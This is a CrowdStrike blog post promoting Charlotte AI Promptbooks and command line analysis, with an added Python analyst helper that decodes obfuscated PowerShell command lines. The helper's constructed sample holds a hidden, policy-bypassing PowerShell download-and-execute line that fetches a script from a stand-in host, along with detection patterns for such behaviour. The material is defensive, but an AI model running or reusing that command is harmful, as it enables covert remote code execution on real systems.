Since CrowdStrike® Charlotte AI™ became generally available, we’ve seen first-hand how genAI can transform security operations, enabling teams to save hours on time-sensitive tasks and accelerate response to match the speed of modern adversaries. Charlotte AI — recently named the best AI security solution by the Cybersecurity Excellence Awards and the market leader for AI Safety Co-Pilot by the Cyber Defense Global Infosec Awards – enables teams to do everything they already do faster than ever, thanks to the industry-leading CrowdStrike Falcon® platform powered by native AI.
To further accelerate SOC transformation, we are highlighting two key Charlotte AI innovations announced at RSA Conference 2024: Promptbooks and command line analysis. With Promptbooks, teams can organize sequences of prompts for common workflows and run them with the press of a button. With command line analysis, Charlotte AI gives analysts plain-language explanations that demystify unfamiliar commands and scripts, providing the context they need to make faster, more accurate decisions.
Let’s get into the details.
Operationalizing Generative AI with Promptbooks
Training analysts to execute workflows quickly and consistently can be tedious. Charlotte AI Promptbooks let organizations create, edit and share collections of prompts for common workflows, removing the guesswork of working out how to phrase a prompt for the best results and which follow-up questions to ask to complete a workflow with Charlotte AI.
Users can get started quickly with ready-to-use Promptbooks from CrowdStrike's expert security teams, or create their own custom Promptbooks. They can also share custom Promptbooks with other authorized Charlotte AI users in their organization, so teams can collaborate on and refine Promptbooks over time.
CrowdStrike's catalog of Promptbooks supports common workflows, such as:
- Zero-Day Vulnerability Promptbook: Gathers information about a new vulnerability, assesses the organization's exposure to it across the attack surface and identifies anomalous behavior on vulnerable hosts.
- Threat Actor Promptbook: Identifies threat actors targeting the user's industry or region, scans the environment for detections attributed to those actors, assesses exposure to vulnerabilities they are known to exploit and presents CrowdStrike indicators for these adversaries.
- Find Indicators Promptbook: Presents threat intelligence for given indicators (IP addresses, domains, etc.) and identifies hosts that connected to those indicators over a given period of time.
- Advanced Event Search Query Promptbook: Generates a CrowdStrike Query Language (CQL) query from the parameters provided in the user's prompt.
- Live Asset Query Promptbook: Generates a live asset query (in osquery syntax) to answer questions using CrowdStrike Falcon® for IT.
- Intel Reports Promptbook: Queries CrowdStrike's threat intelligence to surface relevant reports and specific answers to the user's questions.
- Sensor Deployment Promptbook: Provides guidance on deploying the Falcon sensor on different platforms (Windows, Mac, Linux, Android, iOS, etc.).
Before running a Promptbook, users can adjust settings to tailor the prompts to their task. In the Zero-Day Vulnerability Promptbook, for example, a user can specify the CVE to investigate (see Figure 2).
Understanding Malicious Scripts with Command Line Analysis
To evade detection, adversaries often abuse binaries, applications and scripts already present in the environment during an intrusion. The CrowdStrike 2024 Global Threat Report reported 73% year-over-year growth in interactive intrusions in the second half of 2023, as adversaries increasingly turn to legitimate tools and stolen credentials to gain access to victim environments quickly. The Falcon platform uses a range of techniques to detect malicious scripts, from indicators of attack (IOAs) to process-based indicators of compromise (IOCs) to ML-based script analysis. But detecting potentially malicious scripts is only half the challenge. Analysts investigating detections often encounter unfamiliar commands or scripting languages, which delays or even blocks decision-making.
With command line analysis, Charlotte AI now gives analysts an easy-to-understand breakdown of which commands are used and what the code is meant to do. This reduces the prior knowledge an analyst needs and provides the context to accelerate decisions during an investigation.
The feature is available both in Charlotte AI and directly in the detections UI for detections flagged for suspicious command lines (see Figure 4). With the press of a button, analysts can analyze flagged command lines from the investigation details panel, without copying or retyping a script into a separate Charlotte AI query. To dig deeper or ask follow-up questions, each command line analysis run from the detections UI also appears in the analyst's Charlotte AI conversation history, so they can continue the analysis with full context (Figures 4 and 5).
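As an added illustration of the kind of breakdown an analyst needs from a flagged command line (example code written for this page, not CrowdStrike or Charlotte AI code), the script below tokenizes a Windows command line, expands PowerShell's abbreviated switches and decodes a -EncodedCommand payload, the step that most often hides what a command really does. The sample command line is constructed inside the block, and the switch table and indicator patterns are this example's own simplified assumptions, not Falcon's detection logic.

```python
"""Analyst helper: break a Windows command line into readable parts.

Constructed example, not CrowdStrike or Charlotte AI code. It tokenizes a
command line, expands PowerShell's abbreviated switches and decodes any
-EncodedCommand payload (base64 of UTF-16LE text).
"""
import base64
import binascii
import re

# Simplified switch table (this example's own, not a complete reference).
# PowerShell accepts any unambiguous prefix of a parameter name, plus the
# fixed aliases below (-e/-ec/-enc, -ep/-ex/-exec).
POWERSHELL_SWITCHES = {
    "noprofile": "skips profile scripts (and any logging they add)",
    "noninteractive": "never prompts the user",
    "windowstyle": "sets console visibility (Hidden = runs unseen)",
    "executionpolicy": "overrides the script execution policy",
    "encodedcommand": "runs a base64-encoded (UTF-16LE) command",
    "command": "runs the given command string",
    "file": "runs a script file",
}
FIXED_ALIASES = {"e": "encodedcommand", "ec": "encodedcommand",
                 "enc": "encodedcommand", "ep": "executionpolicy",
                 "ex": "executionpolicy", "exec": "executionpolicy"}
TAKES_VALUE = {"windowstyle", "executionpolicy", "encodedcommand", "command", "file"}
# Behaviours worth calling out in the decoded script body (assumed patterns).
INDICATORS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "evaluates a string as code"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
     "fetches content over the network"),
]
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmd):
    """Split on whitespace but keep double-quoted arguments together."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmd)]


def resolve_switch(token):
    """Map '-NoP', '-w', '-enc' ... to a full switch name; None if unknown/ambiguous."""
    name = token.lstrip("-/").lower()
    if name in FIXED_ALIASES:
        return FIXED_ALIASES[name]
    matches = [s for s in POWERSHELL_SWITCHES if s.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def decode_encoded_command(value):
    """Decode a -EncodedCommand payload; None if not valid base64 or UTF-16LE."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmd):
    """Return program, expanded switches, decoded payload and analyst notes."""
    tokens = tokenize(cmd)
    result = {"program": None, "switches": [], "arguments": [],
              "decoded_command": None, "notes": []}
    if not tokens:
        result["notes"].append("empty command line")
        return result
    result["program"] = tokens[0].rsplit("\\", 1)[-1].lower()
    if result["program"] not in {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}:
        result["arguments"] = tokens[1:]
        result["notes"].append("not a PowerShell host; arguments left as-is")
        return result
    i = 1
    while i < len(tokens):
        tok, i = tokens[i], i + 1
        if not tok.startswith(("-", "/")):
            result["arguments"].append(tok)
            continue
        switch = resolve_switch(tok)
        if switch is None:
            result["notes"].append(f"unrecognised or ambiguous switch: {tok}")
            continue
        value = None
        if switch in TAKES_VALUE and i < len(tokens):
            value, i = tokens[i], i + 1
        result["switches"].append((switch, value))
        if switch == "windowstyle" and (value or "").lower() == "hidden":
            result["notes"].append("console window hidden from the user")
        if switch == "executionpolicy" and (value or "").lower() == "bypass":
            result["notes"].append("script execution policy bypassed")
        if switch == "encodedcommand":
            decoded = decode_encoded_command(value) if value else None
            result["decoded_command"] = decoded
            if decoded is None:
                result["notes"].append("encoded command missing or not valid base64/UTF-16LE")
            else:
                result["notes"].extend(f"decoded script {meaning}"
                                       for pat, meaning in INDICATORS if pat.search(decoded))
    return result


def explain(cmd):
    """Render the analysis as plain text for an investigation note."""
    r = analyze_command_line(cmd)
    lines = [f"program: {r['program']}"]
    for name, value in r["switches"]:
        shown = "" if value is None else f" {value[:32]}"
        lines.append(f"  -{name}{shown}: {POWERSHELL_SWITCHES[name]}")
    if r["arguments"]:
        lines.append("arguments: " + " ".join(r["arguments"]))
    if r["decoded_command"] is not None:
        lines.append(f"decoded command: {r['decoded_command']}")
    lines.extend(f"note: {n}" for n in r["notes"])
    return "\n".join(lines)


# Constructed sample: the payload is encoded here the way an attacker would
# (UTF-16LE, then base64) so the command line below looks like a real detection.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMAND_LINE = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    f"-NoP -W Hidden -ExecutionPolicy Bypass -enc {SAMPLE_ENCODED}"
)

if __name__ == "__main__":
    print(explain(SAMPLE_COMMAND_LINE))
```

Running the block prints the expanded switches, the decoded payload and notes such as "console window hidden from the user" and "decoded script fetches content over the network", which is the context an analyst wants before deciding on a detection. The switch table is deliberately small; a production helper would cover the full parameter set and other script hosts.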
Helping analysts move even faster
As security teams continue to adopt generative AI, Promptbooks and command line analysis will enable organizations to move even faster, accelerating decision-making, automating investigations and standardizing prompt engineering best practices across their teams.